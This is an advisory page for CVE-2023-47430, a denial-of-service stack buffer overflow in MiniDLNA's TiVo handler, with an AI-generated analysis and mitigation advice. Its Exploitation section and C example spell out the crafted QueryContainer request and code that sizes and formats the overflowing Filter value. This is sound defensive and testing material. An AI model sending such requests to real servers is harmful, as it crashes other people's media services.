VYPR
Unrated severity · NVD Advisory · Published Mar 25, 2024 · Updated Nov 14, 2024

CVE-2023-47430

Description

Stack-buffer-overflow in MiniDLNA v1.3.3's SendContainer() function can be triggered via crafted HTTP requests, causing a denial of service.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A stack-buffer-overflow exists in ReadyMedia (MiniDLNA) version 1.3.3 in the SendContainer() function in tivo_commands.c. The function assembles its SQL ordering and filter clauses by calling strcat() on the fixed-size stack buffers order, order2 and myfilter without checking that the accumulated string still fits. An attacker who supplies enough comma-separated entries in the Filter or SortOrder parameter of a crafted HTTP request therefore writes past the end of those buffers [1][2].

Exploitation

An attacker must be able to reach the MiniDLNA HTTP listener (default port 8200), and the server must have TiVo support turned on with enable_tivo=yes in minidlna.conf (the setting is off in the stock configuration file). No authentication is required. The trigger is a GET request to /TiVoConnect with Command=QueryContainer, a Container value, and a long comma-separated list in the Filter or SortOrder parameter. The references show that 19 or more repetitions of one type in Filter (e.g. video,video,...), or a very long SortOrder value, are enough to overflow the buffers [1][2].
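The C program below is an added example written for this page, not code from ReadyMedia/MiniDLNA. It models the strcat() pattern the Vulnerability section describes (unbounded appends into a fixed-size buffer) beside a bounded replacement that rejects the request instead of overflowing, and it assembles the QueryContainer request from the Exploitation section so the crafted Filter value can be sized against the buffer. The type-to-SQL mapping, the 256-byte buffer size, the Container value "1" and the Host header are assumptions made for the example; the real SendContainer() tables and array sizes are not reproduced here.

```c
#include <stdio.h>
#include <string.h>

#define FILTER_BUF 256  /* assumed size of the fixed local buffer (illustrative) */

/* Expand one Filter entry into an SQL fragment. This mapping is an assumption
 * for the example, not the project's real table; unknown entries add nothing. */
static const char *expand_type(const char *item)
{
    if (strcmp(item, "video") == 0) return "CLASS glob 'item.videoItem*'";
    if (strcmp(item, "audio") == 0) return "CLASS glob 'item.audioItem*'";
    if (strcmp(item, "image") == 0) return "CLASS glob 'item.imageItem*'";
    return NULL;
}

/* Copy the next comma-separated item (truncated to cap-1 bytes), advance *p; 0 at end. */
static int next_item(const char **p, char *item, size_t cap)
{
    size_t n = strcspn(*p, ",");
    if (n == 0 && **p == '\0') return 0;
    size_t m = n < cap ? n : cap - 1;
    memcpy(item, *p, m);
    item[m] = '\0';
    *p += n;
    if (**p == ',') (*p)++;
    return 1;
}

/* Vulnerable shape from the advisory: strcat() appends every expanded entry into
 * a fixed-size buffer with no check that it fits. In SendContainer() the target is
 * a local array, so the overrun corrupts the stack. Never call on untrusted input. */
void build_filter_unchecked(char *myfilter, const char *filter)
{
    char item[64];
    int i = 0;
    myfilter[0] = '\0';
    while (next_item(&filter, item, sizeof item)) {
        const char *sql = expand_type(item);
        if (!sql) continue;
        if (i++) strcat(myfilter, " or ");
        strcat(myfilter, sql);             /* unbounded append: the bug */
    }
}

/* Bounded append: refuses instead of overflowing (leaves room for the NUL). */
static int append_bounded(char *dst, size_t cap, size_t *len, const char *src)
{
    size_t n = strlen(src);
    if (n + 1 > cap - *len) return -1;
    memcpy(dst + *len, src, n + 1);
    *len += n;
    return 0;
}

/* Hardened form: same logic, every append checked against cap.
 * Returns the clause length, or -1 meaning the request must be rejected. */
int build_filter_checked(char *out, size_t cap, const char *filter)
{
    char item[64];
    size_t len = 0;
    int i = 0;
    out[0] = '\0';
    while (next_item(&filter, item, sizeof item)) {
        const char *sql = expand_type(item);
        if (!sql) continue;
        if (i++ && append_bounded(out, cap, &len, " or ") < 0) return -1;
        if (append_bounded(out, cap, &len, sql) < 0) return -1;
    }
    return (int)len;
}

/* Build "type,type,...,type" with n repetitions (the crafted Filter); 0 if dst is too small. */
int repeat_type(char *dst, size_t cap, const char *type, int n)
{
    size_t len = 0;
    dst[0] = '\0';
    for (int k = 0; k < n; k++) {
        if (k && append_bounded(dst, cap, &len, ",") < 0) return 0;
        if (append_bounded(dst, cap, &len, type) < 0) return 0;
    }
    return 1;
}

/* Bytes the expanded clause needs; a result >= FILTER_BUF overflows the unchecked builder. */
int filter_clause_len(const char *filter)
{
    char big[8192];
    return build_filter_checked(big, sizeof big, filter);
}

/* Request for the reported trigger; Container value and Host are placeholders. */
int tivo_query_request(char *out, size_t cap, const char *container, const char *filter)
{
    int n = snprintf(out, cap,
        "GET /TiVoConnect?Command=QueryContainer&Container=%s&Filter=%s HTTP/1.1\r\n"
        "Host: 192.0.2.10:8200\r\n\r\n", container, filter);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}
```

With the assumed 28-byte expansion per entry plus a 4-byte " or " separator, eight video entries expand to 252 bytes and still fit a 256-byte buffer, while the ninth pushes the clause past it; the checked builder returns -1 at exactly that point, which is where a server should answer 400 rather than continue. Sizing the crafted Filter value with filter_clause_len() before sending it is the check a tester wants when confirming that a given build is affected.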

Impact

The attacker can cause a denial of service by corrupting the stack of the minidlnad process. On builds compiled with a stack protector the overrun trips the canary check and the daemon aborts; without one the corruption is uncontrolled and a crash is still the most likely outcome. The CVSS score cited is 5.3 (Medium), with low attack complexity and no privileges required. Although the bug is a stack-buffer-overflow, none of the available references describe exploitation for code execution; the reported impact is limited to availability [1][2].

Mitigation

As of the publication date (2024-03-25), no patched release of ReadyMedia (MiniDLNA) has been published for this CVE; the latest stable release remains v1.3.3 and the project appears inactive. Users who do not need TiVo support should disable it by setting enable_tivo=no in minidlna.conf and restarting minidlnad, which removes the /TiVoConnect handler from the attack surface. Because the listener on port 8200 is unauthenticated, it should also be reachable only from trusted LAN hosts. Where TiVo support is required, switching to alternative DLNA media server software is the remaining option. No known KEV listing exists [1][2].

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0. No patches discovered yet.

Vulnerability mechanics: not generated. The four sections (root cause, attack vector, affected code, fix) are only produced when the actual fix diff can be read; without that source-code context they would be speculation rather than analysis.

References: 2

News mentions: 0. No linked articles in our index yet.